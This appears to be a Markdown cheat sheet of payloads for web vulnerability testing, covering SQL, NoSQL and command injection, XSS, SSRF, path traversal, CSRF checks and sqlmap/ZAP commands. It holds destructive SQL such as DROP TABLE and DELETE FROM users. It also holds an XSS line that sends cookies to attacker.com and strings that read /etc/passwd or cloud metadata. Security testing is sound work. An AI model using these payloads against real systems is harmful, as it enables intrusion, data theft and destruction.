94 lines
1.3 KiB
Markdown
94 lines
1.3 KiB
Markdown
# Vulnerability Test Payloads
|
|
|
|
## SQL Injection
|
|
|
|
### Text Input
|
|
```
|
|
' OR '1'='1
|
|
' OR 1=1 --
|
|
'; DROP TABLE users; --
|
|
' UNION SELECT NULL, NULL --
|
|
```
|
|
|
|
### Numeric Input
|
|
```
|
|
1 OR 1=1
|
|
1; DELETE FROM users; --
|
|
```
|
|
|
|
### Blind (Time-based)
|
|
```
|
|
' OR SLEEP(5) --
|
|
' AND (SELECT(SLEEP(5)))a --
|
|
```
|
|
|
|
## XSS (Cross-Site Scripting)
|
|
|
|
### Reflected
|
|
```html
|
|
<script>alert('XSS')</script>
|
|
<img src=x onerror=alert('XSS')>
|
|
<svg/onload=alert('XSS')>
|
|
"><script>alert('XSS')</script>
|
|
```
|
|
|
|
### DOM-based
|
|
```
|
|
javascript:alert('XSS')
|
|
<iframe src="javascript:alert('XSS')"></iframe>
|
|
```
|
|
|
|
### Cookie Theft
|
|
```html
|
|
<script>fetch('http://attacker.com/?c='+document.cookie)</script>
|
|
```
|
|
|
|
## NoSQL Injection (MongoDB)
|
|
|
|
```json
|
|
{"$ne": null}
|
|
{"$gt": ""}
|
|
{"$regex": ".*"}
|
|
{"$where": "1==1"}
|
|
```
|
|
|
|
## Command Injection
|
|
|
|
```
|
|
; ls -la
|
|
| whoami
|
|
`whoami`
|
|
$(whoami)
|
|
```
|
|
|
|
## SSRF
|
|
|
|
```
|
|
http://localhost/admin
|
|
http://127.0.0.1/admin
|
|
http://169.254.169.254/ # AWS metadata
|
|
```
|
|
|
|
## Path Traversal
|
|
|
|
```
|
|
../../../etc/passwd
|
|
..%2F..%2F..%2Fetc%2Fpasswd
|
|
```
|
|
|
|
## CSRF Testing
|
|
|
|
1. Submit form without CSRF token
|
|
2. Reuse captured token multiple times
|
|
3. Modify/remove token parameter
|
|
|
|
## Testing Tools
|
|
|
|
```bash
|
|
# SQLMap
|
|
sqlmap -u "http://example.com/page?id=1" --dbs
|
|
|
|
# OWASP ZAP active scan
|
|
zap-cli active-scan http://example.com
|
|
```
|